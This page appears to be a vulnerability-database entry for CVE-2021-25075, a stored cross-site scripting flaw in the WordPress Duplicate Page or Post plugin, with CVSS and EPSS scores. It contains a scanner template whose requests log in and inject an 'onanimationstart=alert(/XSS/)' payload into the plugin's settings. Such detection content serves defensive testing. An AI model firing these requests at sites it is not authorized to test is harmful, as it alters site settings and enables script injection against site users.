3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
3.5 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
3.9 Low
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
30.9%
WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
id: CVE-2021-25075
info:
name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
author: DhiyaneshDK
severity: low
description: |
WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Fixed in version 1.5.1.
reference:
- https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
- https://nvd.nist.gov/vuln/detail/CVE-2021-25075
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/kazet/wpgarlic
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
cvss-score: 3.5
cve-id: CVE-2021-25075
cwe-id: CWE-862
epss-score: 0.00071
epss-percentile: 0.30442
cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: wpdevart
product: duplicate_page_or_post
framework: wordpress
tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
- |
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
- "toplevel_page_wpda_duplicate_post_menu"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a00463044022077f210250f3482bba71ed34537c591cdac0a7d3c0ac9e2d84956ae5c8df4d5430220071507b63b43298b7af76742ac5962469b6912baa0b527ac7794bd18a2ebf931:922c64590222798bb761d5b6d8e72950
3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
3.5 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
3.9 Low
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
30.9%